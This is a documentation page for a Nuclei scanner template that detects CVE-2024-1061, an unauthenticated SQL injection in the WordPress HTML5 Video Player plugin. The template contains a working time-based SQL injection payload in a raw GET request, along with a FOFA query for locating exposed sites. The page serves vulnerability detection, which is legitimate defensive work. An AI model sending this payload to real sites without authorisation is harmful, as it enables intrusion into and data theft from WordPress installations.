Skip to content
Nuclei Templates

WordPress HTML5 Video Player - SQL Injection

ID: CVE-2024-1061

Severity: critical

Author: xxcdd

Tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins

Description

Section titled “Description”

WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2024-1061


info:
  name: WordPress HTML5 Video Player - SQL Injection
  author: xxcdd
  severity: critical
  description: |
    WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
  reference:
    - https://www.tenable.com/security/research/tra-2024-02
    - https://wordpress.org/plugins/html5-video-player
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
    - https://github.com/tanjiti/sec_profile
    - https://github.com/JoshuaMart/JoshuaMart
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-1061
    cwe-id: CWE-89
    epss-score: 0.00934
    epss-percentile: 0.82678
    cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bplugins
    product: html5_video_player
    framework: wordpress
    fofa-query: "\"wordpress\" && body=\"html5-video-player\""
  tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins


http:
  - raw:
      - |
        @timeout: 20s
        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "created_at", "video_id")'
        condition: and
# digest: 490a00463044022053e00d0480fe1ff4e94cb8fecbd7c9bc242b2fa36533757491c792cb45cddd3102202ad19dbd04d4ac5726acbb52c706353909ebd284c93fdfc9dd09e3a296ef39f1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-1061.yaml"

View on Github